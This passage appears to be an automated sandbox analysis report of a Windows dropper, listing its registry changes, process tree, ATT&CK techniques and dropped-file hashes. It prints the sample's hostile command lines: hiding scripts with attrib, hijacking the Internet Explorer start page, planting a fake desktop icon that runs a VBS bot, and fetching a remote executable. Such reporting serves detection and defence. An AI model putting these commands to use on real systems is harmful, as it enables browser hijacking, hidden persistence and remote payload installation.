Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}\LocalizedString = "@shdoclc.dll,-880"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}\InProcServer32	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}\ShellFolder\Attributes = "0"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}\ShellFolder\HideOnDesktopPerUser	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}\InProcServer32	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}\shell\┤≥┐¬╓≈╥│(&H)\	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}\shell\╩⌠╨╘(&R)\Command\	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}\DefaultIcon	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}\DefaultIcon	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}\InProcServer32\ = "%systemRoot%\\SysWow64\\shdocvw.dll"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}\shell\ = "┤≥┐¬╓≈╥│(&H)"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}\shell\┤≥┐¬╓≈╥│(&H)\MUIVerb = "@shdoclc.dll,-10241"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}\shell\┤≥┐¬╓≈╥│(&H)\Command\ = "wscript.exe c:\\progra~1\\Kingsoft\\myfile\\Microsoft\\bot.vbs"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}\shell\╩⌠╨╘(&R)\	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}\ShellFolder\HideFolderVerbs	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}\DefaultIcon\ = "shdoclc.dll,0"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}\InProcServer32\	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}\ShellFolder	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}\shell	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}\InfoTip = "@shdoclc.dll,-880"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}\InProcServer32\ThreadingModel = "Apartment"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}\shell\	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}\shell\╩⌠╨╘(&R)\Command	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}\ShellFolder	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}\shell\╩⌠╨╘(&R)\Command	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}\shell\╩⌠╨╘(&R)\Command\ = "rundll32.exe shell32.dll,Control_RunDLL INETCPL.CPL,,0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}\ShellFolder	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}\ShellFolder	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}\ShellFolder\WantsParsDisplayName	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}\DefaultIcon\	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}\shell\┤≥┐¬╓≈╥│(&H)\Command	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}\shell\┤≥┐¬╓≈╥│(&H)\Command\	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}\	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}\InProcServer32	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}\shell\┤≥┐¬╓≈╥│(&H)\Command	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}\shell	reg.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
1516	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1232	iexplore.exe

Suspicious use of SetWindowsHookEx 9 IoCs

pid	Process
1232	iexplore.exe
1232	iexplore.exe
1384	IEXPLORE.EXE
1384	IEXPLORE.EXE
1384	IEXPLORE.EXE
1384	IEXPLORE.EXE
1592	f42r.exe
1592	f42r.exe
1592	f42r.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1516 wrote to memory of 1584	1516	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe	27
PID 1516 wrote to memory of 1584	1516	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe	27
PID 1516 wrote to memory of 1584	1516	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe	27
PID 1516 wrote to memory of 1584	1516	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe	27
PID 1584 wrote to memory of 584	1584	adminlog.exe	28
PID 1584 wrote to memory of 584	1584	adminlog.exe	28
PID 1584 wrote to memory of 584	1584	adminlog.exe	28
PID 1584 wrote to memory of 584	1584	adminlog.exe	28
PID 584 wrote to memory of 1928	584	WScript.exe	29
PID 584 wrote to memory of 1928	584	WScript.exe	29
PID 584 wrote to memory of 1928	584	WScript.exe	29
PID 584 wrote to memory of 1928	584	WScript.exe	29
PID 1928 wrote to memory of 1232	1928	cmd.exe	31
PID 1928 wrote to memory of 1232	1928	cmd.exe	31
PID 1928 wrote to memory of 1232	1928	cmd.exe	31
PID 1928 wrote to memory of 1232	1928	cmd.exe	31
PID 584 wrote to memory of 1860	584	WScript.exe	32
PID 584 wrote to memory of 1860	584	WScript.exe	32
PID 584 wrote to memory of 1860	584	WScript.exe	32
PID 584 wrote to memory of 1860	584	WScript.exe	32
PID 1860 wrote to memory of 1324	1860	cmd.exe	34
PID 1860 wrote to memory of 1324	1860	cmd.exe	34
PID 1860 wrote to memory of 1324	1860	cmd.exe	34
PID 1860 wrote to memory of 1324	1860	cmd.exe	34
PID 1860 wrote to memory of 1316	1860	cmd.exe	35
PID 1860 wrote to memory of 1316	1860	cmd.exe	35
PID 1860 wrote to memory of 1316	1860	cmd.exe	35
PID 1860 wrote to memory of 1316	1860	cmd.exe	35
PID 1860 wrote to memory of 452	1860	cmd.exe	36
PID 1860 wrote to memory of 452	1860	cmd.exe	36
PID 1860 wrote to memory of 452	1860	cmd.exe	36
PID 1860 wrote to memory of 452	1860	cmd.exe	36
PID 1860 wrote to memory of 1920	1860	cmd.exe	37
PID 1860 wrote to memory of 1920	1860	cmd.exe	37
PID 1860 wrote to memory of 1920	1860	cmd.exe	37
PID 1860 wrote to memory of 1920	1860	cmd.exe	37
PID 1860 wrote to memory of 1864	1860	cmd.exe	38
PID 1860 wrote to memory of 1864	1860	cmd.exe	38
PID 1860 wrote to memory of 1864	1860	cmd.exe	38
PID 1860 wrote to memory of 1864	1860	cmd.exe	38
PID 1860 wrote to memory of 836	1860	cmd.exe	39
PID 1860 wrote to memory of 836	1860	cmd.exe	39
PID 1860 wrote to memory of 836	1860	cmd.exe	39
PID 1860 wrote to memory of 836	1860	cmd.exe	39
PID 1860 wrote to memory of 1296	1860	cmd.exe	41
PID 1860 wrote to memory of 1296	1860	cmd.exe	41
PID 1860 wrote to memory of 1296	1860	cmd.exe	41
PID 1860 wrote to memory of 1296	1860	cmd.exe	41
PID 1860 wrote to memory of 1800	1860	cmd.exe	42
PID 1860 wrote to memory of 1800	1860	cmd.exe	42
PID 1860 wrote to memory of 1800	1860	cmd.exe	42
PID 1860 wrote to memory of 1800	1860	cmd.exe	42
PID 1860 wrote to memory of 556	1860	cmd.exe	43
PID 1860 wrote to memory of 556	1860	cmd.exe	43
PID 1860 wrote to memory of 556	1860	cmd.exe	43
PID 1860 wrote to memory of 556	1860	cmd.exe	43
PID 1860 wrote to memory of 1680	1860	cmd.exe	44
PID 1860 wrote to memory of 1680	1860	cmd.exe	44
PID 1860 wrote to memory of 1680	1860	cmd.exe	44
PID 1860 wrote to memory of 1680	1860	cmd.exe	44
PID 1860 wrote to memory of 1992	1860	cmd.exe	45
PID 1860 wrote to memory of 1992	1860	cmd.exe	45
PID 1860 wrote to memory of 1992	1860	cmd.exe	45
PID 1860 wrote to memory of 1992	1860	cmd.exe	45

Views/modifies file attributes 1 TTPs 4 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
1316	attrib.exe
452	attrib.exe
1920	attrib.exe
1324	attrib.exe

C:\Users\Admin\AppData\Local\Temp\81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
"C:\Users\Admin\AppData\Local\Temp\81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe"
1⤵
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1516
- C:\Users\Admin\AppData\Local\Temp\adminlog.exe
  "C:\Users\Admin\AppData\Local\Temp\adminlog.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  - Suspicious use of WriteProcessMemory
  PID:1584
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Program Files\Kingsoft\myfile\file.vbs"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:584
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C start /min iexplore http://www.dao234.com/index2.html?51dd
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1928
    - - C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" http://www.dao234.com/index2.html?51dd
        5⤵
        Modifies Internet Explorer settings
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        
        PID:1232
      - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1232 CREDAT:275457 /prefetch:2
        6⤵
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:1384
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C .\tool.cmd
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1860
    - - C:\Windows\SysWOW64\attrib.exe
        
        attrib +r +h +s ".\tool.cmd"
        5⤵
        Sets file to hidden
        Drops file in Program Files directory
        Views/modifies file attributes
        
        PID:1324
    - - C:\Windows\SysWOW64\attrib.exe
        
        attrib +r +h +s ".\open.vbs"
        5⤵
        Sets file to hidden
        Drops file in Program Files directory
        Views/modifies file attributes
        
        PID:1316
    - - C:\Windows\SysWOW64\attrib.exe
        
        attrib +r +h +s ".\starts.vbs"
        5⤵
        Sets file to hidden
        Drops file in Program Files directory
        Views/modifies file attributes
        
        PID:452
    - - C:\Windows\SysWOW64\attrib.exe
        
        attrib +r +h +s ".\Microsoft\bot.vbs"
        5⤵
        Sets file to hidden
        Drops file in Program Files directory
        Views/modifies file attributes
        
        PID:1920
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoInternetIcon" /t REG_DWORD /d 1 /f
        5⤵
        
        PID:1864
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{00000108-0000-0010-8000-00AA006DCCCC}"
        5⤵
        
        PID:836
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}"
        5⤵
        Modifies registry class
        
        PID:1296
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}" /v "InfoTip" /t REG_SZ /d "@shdoclc.dll,-880" /f
        5⤵
        Modifies registry class
        
        PID:1800
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}" /v "LocalizedString" /t REG_SZ /d "@shdoclc.dll,-880" /f
        5⤵
        Modifies registry class
        
        PID:556
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}\DefaultIcon"
        5⤵
        Modifies registry class
        
        PID:1680
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}\DefaultIcon" /ve /t REG_EXPAND_SZ /d "shdoclc.dll,0" /f
        5⤵
        Modifies registry class
        
        PID:1992
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}\InProcServer32"
        5⤵
        Modifies registry class
        
        PID:752
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}\InProcServer32" /ve /t REG_SZ /d "%systemRoot%\system32\shdocvw.dll" /f
        5⤵
        Modifies registry class
        
        PID:1056
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}\InProcServer32" /v "ThreadingModel" /t REG_SZ /d "Apartment" /f
        5⤵
        Modifies registry class
        
        PID:964
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}\shell"
        5⤵
        Modifies registry class
        
        PID:1788
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}\shell" /ve /t REG_SZ /d "┤≥┐¬╓≈╥│(&H)" /f
        5⤵
        Modifies registry class
        
        PID:1772
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}\shell\┤≥┐¬╓≈╥│(&H)"
        5⤵
        Modifies registry class
        
        PID:644
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}\shell\┤≥┐¬╓≈╥│(&H)" /v "MUIVerb" /t REG_SZ /d "@shdoclc.dll,-10241" /f
        5⤵
        Modifies registry class
        
        PID:1588
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}\shell\┤≥┐¬╓≈╥│(&H)\Command"
        5⤵
        Modifies registry class
        
        PID:552
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}\shell\┤≥┐¬╓≈╥│(&H)\Command" /ve /t REG_SZ /d "wscript.exe c:\progra~1\Kingsoft\myfile\Microsoft\bot.vbs" /f
        5⤵
        Modifies registry class
        
        PID:576
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}\shell\╩⌠╨╘(&R)"
        5⤵
        Modifies registry class
        
        PID:1784
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}\shell\╩⌠╨╘(&R)\Command"
        5⤵
        Modifies registry class
        
        PID:1776
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}\shell\╩⌠╨╘(&R)\Command" /ve /t REG_SZ /d "rundll32.exe shell32.dll,Control_RunDLL INETCPL.CPL,,0" /f
        5⤵
        Modifies registry class
        
        PID:108
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}\ShellFolder"
        5⤵
        Modifies registry class
        
        PID:1744
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}\ShellFolder" /v "Attributes" /t REG_DWORD /d 0 /f
        5⤵
        Modifies registry class
        
        PID:1060
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}\ShellFolder" /v "HideFolderVerbs" /t REG_SZ /d "" /f
        5⤵
        Modifies registry class
        
        PID:1876
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}\ShellFolder" /v "HideOnDesktopPerUser" /t REG_SZ /d "" /f
        5⤵
        Modifies registry class
        
        PID:872
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}\ShellFolder" /v "WantsParsDisplayName" /t REG_SZ /d "" /f
        5⤵
        Modifies registry class
        
        PID:1316
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_SZ /d "http://www.9281.net/?cmd" /f
        5⤵
        Modifies Internet Explorer settings
        Modifies Internet Explorer start page
        
        PID:1064
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Default_Page_URL" /t REG_SZ /d "http://www.9281.net/?cmd" /f
        5⤵
        Modifies Internet Explorer settings
        
        PID:788
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C .\360.cmd
      4⤵
      Drops file in Program Files directory
      PID:1964
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C .\fav\fav.cmd
      4⤵
      Drops file in Program Files directory
      PID:1800
- C:\Windows\SysWOW64\wscript.exe
  "wscript.exe" C:\Users\Admin\AppData\Local\Temp\123.vbs
  2⤵
  - Loads dropped DLL
  PID:872
- - C:\Users\Admin\AppData\Local\Temp\syslog.exe
    "C:\Users\Admin\AppData\Local\Temp\syslog.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:1400
  - - C:\Users\Admin\AppData\Local\Temp\setup.exe.exe
      "C:\Users\Admin\AppData\Local\Temp\setup.exe.exe"
      4⤵
      Executes dropped EXE
      PID:1092
  - - C:\Users\Admin\AppData\Local\Temp\youbei.exe.exe
      "C:\Users\Admin\AppData\Local\Temp\youbei.exe.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:296
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\f42r.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\f42r.exe" "http://download.youbak.com/msn/software/partner/36a.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:1592

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Privilege Escalation

Defense Evasion

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Kingsoft\myfile\360.cmd

Filesize
1018B

MD5
8c29879e7f04898e3546273718e84ac3

SHA1
abd1bb2dbda58361ca8990654c7d4229f04f9c96

SHA256
62200ae22dac66425e3d02c517953498a96870aa48a8280a168f7d58d0e42856

SHA512
c687f20504c6b9e235899e499839ba86c3ab23f1dbf9b5f91c7f9de9ac52f130a11f6218b2845dd14915439f711cea94c9b0a0292e62b8f9c37fe5ed105215f4

Download Submit
C:\Program Files\Kingsoft\myfile\Internet Expl0rer.lnk

Filesize
104B

MD5
bfcdb036c88aa44826253577e5306e76

SHA1
687c9c104f25c1c4d94b6929e68b51fcb1560412

SHA256
c765f7b9f90fc6fb6ad5ecda3f4219e5d07f793defb9b9b9ea4c23d4e62795cd

SHA512
049a5c62b7bbbc9c1d9f911ccbec5388e137149f3b34c42e08aa0de2b22c46450c408dd987b96ae3c857f5e56e457c4485501d82a0790348fda952b3ea64d1ed

Download Submit
C:\Program Files\Kingsoft\myfile\Microsoft\bot.vbs

Filesize
150B

MD5
60957d450b2388e851e1c14b478e493f

SHA1
dd88327e4b120449b4281a98a54c5e255b931b66

SHA256
0eff0acb0a712b54003d39b9fdbe98fe023b4ad6821c2d749fa7cdcb2e6abbc0

SHA512
09eee433e8253a3401656974cbe3c76cf5fc2ac5afea700c6ea91230ab12c292cfd481548e18ea0c4597dce6ac34f30f3f1fd14c4d6543c20ee551b167438576

Download Submit
C:\Program Files\Kingsoft\myfile\fav\fav.cmd

Filesize
340B

MD5
117120c9a895a0495e45800e533107f6

SHA1
0b3f93b0a5eff59e2e6c4368e4647f95eb1b0629

SHA256
446472940134137cc6735eadc162054f02a96a3b5ac9a860510d57d8fb585027

SHA512
aeac16020997169759265437fa662e9f1a8ade7b0bce56da4de8cfcad7896e176f3a66304142a7185195236e6c0e3a4ed32d135946c0b3c3a2aec7a97f335033

Download Submit
C:\Program Files\Kingsoft\myfile\fav\tao2.ico

Filesize
12KB

MD5
8320a22354a5419af035cdf42902ae93

SHA1
d9954707de08eaa6ecc7d13d69f76c51b316ebcc

SHA256
419408ac3e52f9b5878825dd3fc416a394ff5665208bbd36930ea52910be04bc

SHA512
592c4404292705321da9ec099ff60a22d396395acf31f900d4da661949a40c7966fcb20e7f8cadcd41c1dc729a290d68b21a74a352cb5b1b0a1b7b0ca1d5715b

Download Submit
C:\Program Files\Kingsoft\myfile\file.vbs

Filesize
346B

MD5
717fd6d87040c9b1d671a04a7bf739f8

SHA1
f2a5f183c9151065c289fe09c7da592eefa36d11

SHA256
b24dd257dd7ec11e922a2cda431af8a831bf8317bfcf806a5c4956f787129c22

SHA512
d6fb655d49896061d6a3f328f54455e8db774b46b410527c4b40682491c144376aac0b2ba0cdc5c6574335376298d1f637afa092a598ee8ea5ce9679b0db6a69

Download Submit
C:\Program Files\Kingsoft\myfile\open.vbs

Filesize
234B

MD5
de74b833baf31e61d0b1888079050044

SHA1
2db44ceda0b82b80eb659beb549912c366bc0884

SHA256
a7ed0d8b7d01af6c889384df1f39f1d25f3726271dccff3ce92bbea17b826975

SHA512
30657c3028d70cf4810b01202af779c97900b08b0345460eb33c9d1dfc83276a6d881395039d1c1cf41759a230750b1af893719d26f20162a4832555249ffeb7

Download Submit
C:\Program Files\Kingsoft\myfile\se.vbs

Filesize
174B

MD5
a38677651a84291c87714ae75327c8af

SHA1
dbcf971e7cdee38ff12d1d25dd11d51744e402d7

SHA256
861762e94987be82592a2f466d9906451cb36187efcc4ec39533b0dec254d690

SHA512
d00c0a7d31c6a1f83fddeecf94fe6ad6786e47fa73d40c1d83870bb17229ed0213684248aa91f805ce32db8ff235e51a322e2190feed7c098141d19a5d158f45

Download Submit
C:\Program Files\Kingsoft\myfile\se1.vbs

Filesize
174B

MD5
4654319f7c4223d46308b4b9a48d5e7d

SHA1
031cbc87a7e6a794f21b4452d1b478b0f0e62f89

SHA256
3ad3323b74967f5828032b1ffc0e50e0f633100df3b8657320a8572ab830673d

SHA512
687c7e04673e4cc9e3324590d7f28fb35d5b931ea48b4ba959fdd5ddd7fbfc598b571b03e28aaf7180e9267a0c5d0644fcde136afbe20776f038ca0bb704c894

Download Submit
C:\Program Files\Kingsoft\myfile\starts.vbs

Filesize
149B

MD5
440c8d7340a88e3fadfd444c5460c088

SHA1
440675d6fe90710c1854518e06aa9abe8b959b9c

SHA256
9905a368352989559d63a1c022d447e0788dfacd6b266fc5ee6ad6cbc90591cd

SHA512
96b17d83a73814be2313093b108a3a3ef38bc9407e4a80d264f2e59eada78fda0e3decabc19d53ff55b878a469113fc3de6f33482bc0881102661d24344912e0

Download Submit
C:\Program Files\Kingsoft\myfile\tool.cmd

Filesize
4KB

MD5
cc64c6ff303218674161c13ff53e0e74

SHA1
1a9eb52104d9ff12ed4b6c6798c23d1de1b4285d

SHA256
0a1714f683b83170b1d190904d5a13eca30fc35fc4ffb5a1f75b29ef58301ffd

SHA512
ad0c042a69b3ab984ccfbc9817318dadc2ea5e98fc989bed57737b3dd82eb5704b379f48b364ba75af3f22d32bdc3bc205ae2df345b61a1d4e2324767aa1bc3b

Download Submit
C:\Program Files\Kingsoft\myfile\tools.lnk

Filesize
757B

MD5
9ae874c9130cff5b6eec97eea2d65c03

SHA1
5f65f613afad727b69600c941fe1783ff645eaf2

SHA256
2cf69675c2211b612ee8fd5140936d977a9de2f8b2b2c6f525e6702d7c82f940

SHA512
28f93301aaca370847824bd091e5588d2be36c498f976dece06a6228b0b465c7cdc1b0d65193ac93e14e9a893f543847ddb90e80cd9313939f851d988e502a7a

Download Submit
C:\Users\Admin\AppData\Local\Temp\123.vbs

Filesize
195B

MD5
62e9abcd55c32f104764fa77abb71ab8

SHA1
a4e2ad6fc4782fd54457c567fabcd1042f86d7b1

SHA256
b9daf5bae71d1201089ae61a6f94777d33ba6c837c1d2b50debf8bf02d6fa9bf

SHA512
014a9b7c70eb5877b6cfaf7b2730607262f4a7c61b840849de72a3c1f2c5ac7555ba31ff8528f629feadcaa605cf7388e12b5cb48ff7a0b294510fc7e9912688

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\f42r.exe

Filesize
228KB

MD5
7c9e6e3501b16c613cfa6fbbd814bc6f

SHA1
33630a78fba5401b183fcdef83ce6412bf14b02a

SHA256
7abe19430e454b3aa7763f198f24fb0be3d79cb9648d611f3b8859eae7d3a333

SHA512
e86cafacf173acc1e2d788d3e0bce432583d1cd4a45fe99d149fbc50480b883f85def021300843c73b8cbce512d2ef56f30ca5978c7d14720898f62b6dc7879d

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\f42r.exe

Filesize
228KB

MD5
7c9e6e3501b16c613cfa6fbbd814bc6f

SHA1
33630a78fba5401b183fcdef83ce6412bf14b02a

SHA256
